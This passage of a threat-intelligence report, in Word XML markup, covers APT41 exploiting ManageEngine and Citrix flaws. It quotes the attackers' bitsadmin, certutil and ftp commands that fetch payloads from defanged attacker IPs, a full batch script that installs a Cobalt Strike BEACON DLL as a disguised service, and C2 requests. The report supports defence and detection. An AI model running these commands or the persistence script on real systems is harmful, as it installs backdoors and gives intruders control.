      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="327568C0" w14:textId="77777777" w:rsidTr="00356DA3">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C2EA54"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Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A491AD"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Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D404B7D"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069CEE07"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In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="2808C976" w14:textId="77777777" w:rsidTr="00356DA3">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64406F"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@echo off</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A08BD84"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set "WORK_DIR=C:\Windows\System32"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C5B269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set "DLL_NAME=storesyncsvc.dll"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE4BDE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set "SERVICE_NAME=StorSyncSvc"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75555C11"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set "DISPLAY_NAME=Storage Sync Service"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66B9F7A0"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set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="075DB44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sc stop %SERVICE_NAME%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30D9EB00"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sc delete %SERVICE_NAME%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3319255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mkdir %WORK_DIR%</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BB036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lastRenderedPageBreak/>
              <w:t>copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F7E5D1D"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reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DC6DB1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sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70CF7B49"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SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B9845F"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sc description "%SERVICE_NAME%" "%DESCRIPTION%"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02181D3D"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reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72264FC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reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CF5BFD"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net start "%SERVICE_NAME%"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74257175"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 8: Contents of install.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7E7B2E"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Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="5E6E2B90" w14:textId="77777777" w:rsidTr="00356DA3">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488049"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GET /jquery-3.3.1.min.js HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Host: cdn.bootcss.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Referer: http://cdn.bootcss.com/</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Connection: Keep-Alive Cache-Control: no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="438A123F"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EADA0C"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Within a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>TTP that we’ve observed APT41 use in past intrusions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>usage of VMProtected binaries</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3648"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="0D904327" w14:textId="77777777" w:rsidTr="00356DA3">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BBCC10"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GET /2.exe HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Cache-Control: no-cache</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Connection: Keep-Alive</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pragma: no-cache</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Accept: */*</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>User-Agent: Microsoft-CryptoAPI/6.3</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Host: 91.208.184[.]78</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="726CF1A0"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5143"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="09C40BB6" w14:textId="77777777" w:rsidTr="00356DA3">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7E8BBF"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certutil  -urlcache -split -f http://91.208.184[.]78/2.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4101F91E"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BECFFD"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The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7395"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="41CC07FD" w14:textId="77777777" w:rsidTr="00356DA3">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3DD974"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GET /TzGG HTTP/1.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Host: 91.208.184[.]78:443</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Connection: Keep-Alive</w:t>
            </w:r>
            <w:r w:rsidRPr="00356DA3">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Cache-Control: no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B5B4E60"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inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DA8E12" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="225"/>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The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389102C"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ManageEngine released a short term </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>mitigation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> for CVE-2020-10189 on January 20, 2020, and subsequently released an </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>update</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> on March 7, 2020, with a long term fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3E3455" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="195"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Outlook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796AA49A"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This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation </w:t>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>has focused on a subset of our customers</w:t>
      </w:r>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, and seems to reveal a high operational tempo and wide collection requirements for APT41.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B398E60" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="225"/>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It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17B80A"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Previously, </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>FireEye Mandiant Managed Defense</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="00356DA3">
          <w:rPr>
            <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="2E5799"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>unique</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC3631" w14:textId="77777777" w:rsidR="00356DA3" w:rsidRPr="00356DA3" w:rsidRDefault="00356DA3" w:rsidP="00356DA3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356DA3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Arial"/>
          <w:color w:val="44474D"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Indicators</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3711"/>
        <w:gridCol w:w="5633"/>
      </w:tblGrid>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="464377BD"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B7D87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Type</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FF8C8FD"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Indicator(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00356DA3" w:rsidRPr="00356DA3" w14:paraId="712B27D3"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5561B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lastRenderedPageBreak/>
              <w:t>CVE-2019-19781 Exploitation (Citrix Application Delivery Control)</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7931521"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66.42.98[.]220</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="409E76C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CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A40217D"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CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="295186C9"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CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37ACA6B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/tmp/bsd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="758457D9"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/tmp/un</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
